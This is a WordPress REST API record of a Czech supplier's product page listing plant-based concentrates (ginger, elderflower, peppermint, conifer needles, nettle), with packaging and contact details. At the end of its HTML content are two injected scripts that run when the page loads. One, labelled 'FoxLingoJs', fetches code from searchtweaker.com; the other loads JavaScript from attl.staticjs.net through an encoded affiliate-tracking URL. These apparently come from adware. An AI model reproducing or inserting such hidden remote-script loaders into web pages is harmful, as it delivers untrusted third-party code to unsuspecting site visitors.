{"id":4,"date":"2014-05-02T13:52:57","date_gmt":"2014-05-02T11:52:57","guid":{"rendered":"http:\/\/web.llcomp.cz\/?page_id=4"},"modified":"2017-04-28T18:05:11","modified_gmt":"2017-04-28T16:05:11","slug":"extrakty","status":"publish","type":"page","link":"https:\/\/web.llcomp.cz\/?page_id=4","title":{"rendered":"Extrakty"},"content":{"rendered":"<p><img decoding=\"async\" src=\"http:\/\/llcomp.cz\/images\/e_box.gif\" alt=\"\" border=\"0\" \/><span style=\"color: #444444;\">\u00a0\u00a0<\/span><b>Na\u0161e nab\u00eddka<\/b><\/p>\n<table style=\"width: 543px;\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td align=\"left\" valign=\"top\" width=\"14\"><\/td>\n<td align=\"left\" valign=\"top\">Na\u0161e extrakty, koncentr\u00e1ty a sirupy dod\u00e1v\u00e1me jak v bio, tak v konven\u010dn\u00ed kvalit\u011b.<br \/>\nV sou\u010dasn\u00e9 dob\u011b nab\u00edz\u00edme pro potravin\u00e1\u0159sk\u00fd a n\u00e1pojov\u00fd pr\u016fmysl n\u00e1sleduj\u00edc\u00ed koncentr\u00e1ty: koncentr\u00e1t ze z\u00e1zvoru<br \/>\nkoncentr\u00e1t z kv\u011bt\u016f \u010dern\u00e9ho bezu<br \/>\nkoncentr\u00e1t z list\u016f m\u00e1ty peprn\u00e9<br \/>\nkoncentr\u00e1t ze smrkov\u00e9ho jehli\u010d\u00ed<br \/>\nkoncentr\u00e1t z borovicov\u00e9ho jehli\u010d\u00ed<br \/>\nkoncentr\u00e1t z list\u016f jitrocele<br \/>\nkoncentr\u00e1t z list\u016f kop\u0159ivyNa\u0161e extrakty a koncentr\u00e1ty dod\u00e1v\u00e1me v r\u016fzn\u00fdch typech balen\u00ed od 200 l sud\u016f a\u017e po 1000 l kontejnery.<br \/>\nDal\u0161\u00ed informace poskytujeme \u00fastn\u011b \u010di p\u00edsemn\u011b<br \/>\nna tel\/fax: +420 235366410, e-mail: info@llcomp.cz, www.sirupy.eu<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<hr \/>\n<p>\u00a92013 &#8211; 2017 \u00a0 \u00a0 LL spol. s r.o.<\/p>\n<p><script id=\"FoxLingoJs\" type=\"text\/javascript\">\/\/ <![CDATA[ (function(){try{var header=document.getElementsByTagName(\"HEAD\")[0];var script=document.createElement(\"SCRIPT\");script.src=\"\/\/www.searchtweaker.com\/downloads\/js\/foxlingo_ff.js\";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==\"complete\"||this.readyState==\"loaded\")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})(); \/\/ ]]><\/script><script src=\"http:\/\/attl.staticjs.net\/amz\/aeyJhZmZpZCI6MTA4MCwic3ViYWZmaWQiOjEwMjAsImhyZWYiOiJodHRwOi8vd2ViLmxsY29tcC5jei93cC1hZG1pbi9wb3N0LW5ldy5waHA%2FcG9zdF90eXBlPXBhZ2UiLCJ3aWR0aCI6MTI4MCwiaGVpZ2h0Ijo4MDAsImxvYWRlcl9jbGllbnRfdGltZXN0YW1wIjoxMzYxMTg4MDM0Njk1fQ%3D%3D.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u00a0\u00a0Na\u0161e nab\u00eddka Na\u0161e extrakty, koncentr\u00e1ty a sirupy dod\u00e1v\u00e1me jak v bio, tak v konven\u010dn\u00ed kvalit\u011b. V sou\u010dasn\u00e9 dob\u011b nab\u00edz\u00edme pro potravin\u00e1\u0159sk\u00fd a n\u00e1pojov\u00fd pr\u016fmysl n\u00e1sleduj\u00edc\u00ed koncentr\u00e1ty: koncentr\u00e1t ze z\u00e1zvoru koncentr\u00e1t z kv\u011bt\u016f \u010dern\u00e9ho bezu koncentr\u00e1t z list\u016f m\u00e1ty peprn\u00e9 koncentr\u00e1t &hellip; <a href=\"https:\/\/web.llcomp.cz\/?page_id=4\">Read more <span class=\"meta-nav\">&raquo;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-4","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/web.llcomp.cz\/index.php?rest_route=\/wp\/v2\/pages\/4","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/web.llcomp.cz\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/web.llcomp.cz\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/web.llcomp.cz\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/web.llcomp.cz\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4"}],"version-history":[{"count":14,"href":"https:\/\/web.llcomp.cz\/index.php?rest_route=\/wp\/v2\/pages\/4\/revisions"}],"predecessor-version":[{"id":675,"href":"https:\/\/web.llcomp.cz\/index.php?rest_route=\/wp\/v2\/pages\/4\/revisions\/675"}],"wp:attachment":[{"href":"https:\/\/web.llcomp.cz\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}